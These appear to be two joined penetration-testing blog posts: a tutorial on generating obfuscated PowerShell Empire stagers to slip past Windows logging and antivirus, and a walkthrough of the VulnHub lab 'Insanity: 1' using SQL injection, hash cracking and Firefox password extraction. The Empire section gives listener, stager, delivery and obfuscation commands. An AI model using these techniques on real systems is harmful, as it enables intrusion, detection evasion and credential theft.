Defense Evasion with obfuscated Empire

In this article, we will learn the technique of Defence Evasion using the PowerShell Empire. PowerShell Empire is one of my favorite Post Exploitation tools and it is an applaudable one at that.

Table of Contents:

·         Installation

·         Getting a session with Empire

·         Obfuscating with Empire

Installation

When evading all the target defenses with Empire, it is important to focus on installation. There are two methods to install Empire, obfuscating scripts would not work if you install Empire using apt install command. But this problem wouldn’t occur if you use the git clone command as shown in the image below.

git clone https://github.com/BC-SECURITY/Empire

The above command will download Empire on your system and to install it, use the following command:

cd Empire/

cd setup/

.install.sh

 

Getting a session with Empire

With the above commands, your Empire is downloaded and installed. Let us now get the Empire up and running and take a session of the target system. Once you start Empire, the first thing to do is to start a Listener. And to start a listener, use the set of following commands:

listeners

uselistener http

set Port 80

execute

 

The above commands will start a listener on port 80. Once the listener is active, we have to launch a stager. The stager that we are going to use in this article is of windows and is in batch language. To launch the stager, use the following set of commands:

back

usestager windows/launcher_bat

set Listener http

execute

 

Once your malware is ready, it will be stored in /tmp directory by default as you can see in the image above. To send this bat file to the target system, you can use python one-liner server or any other method you like. We used a python server for our this practical. To use the python server, type the following command in the directory where the file is saved like in our case it was /tmp directory:

python -m SimpleHTTPServer

 

Once the file is executed in the target system. You will get your session as it is shown in the image below. To access the session or agent (as per the Empire terminology) use the following commands:

agents

interact <agent name>

 

In the event viewer, you can go to the Applications and Services Logs > Microsoft > Windows > PowerShell > Operational and check the log made by the batch file from Empire as shown in the image below:

Obfuscating with Empire

Now, you can see in the image above that the log of the file gives proper detail of the malicious file. These details include the code of the file, where the file is stored, and other important details. These details, when readable by the system, makes it easy for the file to be detected. For successfully attacking the target, it is important to evade all the defenses put up by the target. And to do so, we will globally obfuscate the Empire and then create our malicious file. Obfuscating the Empire will mean all the malicious files that will be generated from Empire will be obscure i.e. they will be had to detect in the target system and will allow you to bypass the defense systems like antiviruses. To obfuscate the Empire, use the following command first:

preobfuscate

The above command will download all the scripts required for the obfuscation.

The command executed above takes a bit of time but if it allows us to be successful in our attack then little time is no problem and most importantly it is worth it. Once all the obfuscating scripts are downloaded, execute the following command:

set Obfuscate true

This command will initiate the obfuscating and all the stagers developed and agents created will be obfuscated, which you can see in the image below:

Now once the obfuscation is active, we will once again execute the listener as shown previously in this article and once the listener is up and running we will launch a stager with the following set of commands:

usestager windows/launcher_bat

set Listener http

execute

 

Similarly, like before, use the python server to deliver the malicious file to the target system.

Once the file is executed in the target system; you will get a new session as shown in the image below. To access the new agent, use the following commands:

agents

interact <agent name>

Now the session we have received is through obfuscation and we will confirm this by using Event Viewer. Follow the same path as earlier (Applications and Services Logs > Microsoft > Windows > PowerShell > Operational) in the Event Viewer to see the log created by our malicious file.  AS you can see in the image below, the details that the log has now is vague and confusing. This makes the file unreadable by the system and is successful in dodging defenses such as anti-viruses.

This way Obfuscated Empire can save you from getting caught in the target system. It is important to learn such techniques to glide by the defenses in the target system to test whether the defenses in the place are proper or not.

Insanity: 1 Vulnhub Walkthrough

Today we are going to solve another boot2root challenge called "Insanity: 1".  It's available at VulnHub for penetration testing and you can download it from here.

The merit of making this lab is due to Thomas Williams. Let's start and learn how to break it down successfully.

Level: Hard

Penetration Testing Methodology

Reconnaissance

§  Netdiscover

§  Nmap

Enumeration

§  Dirsearch

§  Wireshark

Exploiting

• SQL Injection through e-mails
• Password theft in database
• Weak hash cracking

Privilege Escalation

§  Cracking to passwords stored in Firefox

§  Capture the flag

Walkthrough

Reconnaissance

We are looking for the machine with netdiscover

$ netdiscover -i ethX

So, we put the IP address in our "/etc/hosts" file and start by running the map of all the ports with operating system detection, software versions, scripts and traceroute.

$ nmap -A –p- insanity.vh

 

Enumeration

The recognition and enumeration of vulnerable services has been the hardest part of this machine. Since it had many services to which they managed to entangle you, turning out to be all of them (except one) rabbit holes.

 

Some evidence of these services (rabbit hole):

FTP:

Bludit (From here we will list the user "Otis".):

phpMyAdmin:

Having seen the above, we will go directly to the correct and vulnerable services.

We start with the organization's web service, a hosting service.

We puzzled with dirsearch and found several directories, but we will focus only on two "/monitoring/" and "/webmail/".

Well, we used the user "otis" and the password "123456" (I took it out with guessing).

We will enter a panel are monitoring the internal server, we see that we can add new servers.

We insert our IP (it can be another one that is operative) and we see that it marks us "Status: UP". What does this tell us? Well, that the application below is running ping to our machine to check if it is on.

We use dirsearch again, this time we will fuze the content of “/monitoring/”.

We go through the directories obtained, until we reach the directory "/monitoring/class/".

We access the directory and we find what we already imagined, a "ping.php" file.

We open Wireshark and see that the machine does indeed execute a ping. Do you think the same as me? Of course we do! A command injection!

Let's do as usual, a proof of concept.

We wait for it to run, but we see that it does not work (Status: DOWN). We contrast this information with Wireshark and see that it does not move either, so we are in another "rabbit hole".

Well, nothing, we continue with the other service. Now we have a "SquirrelMail" in version 1.4.22, if you look for exploit you will find that it is vulnerable to remote code execute (RCE), but I already advance you that it will not work either xD.

We use the same credentials, access the "Inbox" and see that emails with errors are arriving. Attention! These emails only appear if the server is "DOWN".

We read one of them, if we look at it, it is structured in 4 columns... This is something that called my attention a lot, since it seems to be loading this information through a database.

Seeing this, I lost my mind and came up with the crazy idea of launching a payload list of SQL Injection (/usr/share/wfuzz/wordlist/vulns/sql_inj.txt).

Configuration Attack:

Executed attack:

We are checking all the emails that we receive, we find this one that shows "Localhost", therefore, the site is vulnerable to SQL Injection.

We do another test, this time we list the hostname and version of MariaDB.

Exploiting

We continue to exploit the vulnerability, although this would be faster by posting only 3 photos, I think it is worth seeing all these images, which will help us learn how to exploit SQL injection without any tools.

Obtain user and database:

Obtain all databases:

Obtain all tables:

 

Obtain all the columns in a table:

Dump users, passwords and emails:

After trying to crack the hashes of the two (hidden) users, it is not possible to obtain it even with JTR, Hascat or other online tools. Everything looks like another "rabbit hole".

We continue to list and find these two hashes in the "mysql" database.

The 2nd hash does not correspond to that of a MySQL, we use the online tool "hashes.com" and obtain the password in plain text.

We logged in through SSH and great! We are in!

Privilege Escalation (root)

We do an "ls -lna" and see that we have a "Mozilla Firefox" folder, very very rare.

Whenever you see software folders, check it out, because it's not normal.

We check if the browser has been storing user passwords. How to check this? As simple as listing these 4 files.

If these files exist, it means that they contain passwords and we can use a tool “Firefox_Decrypt” to obtain the passwords in plain.

We download the tool, choose the 2nd option and we will NOT give you a password when you ask for the "Master Password".

We will get some credentials in the "root" user plane.

We try to authenticate with the user "root" and the password obtained and.... Yes! we are root!

We read the flag and have a good coffee.

Author: David Utón is Penetration Tester and security auditor for Web applications, perimeter networks, internal and industrial corporate infrastructures, and wireless networks. Contacted on LinkedIn and Twitter.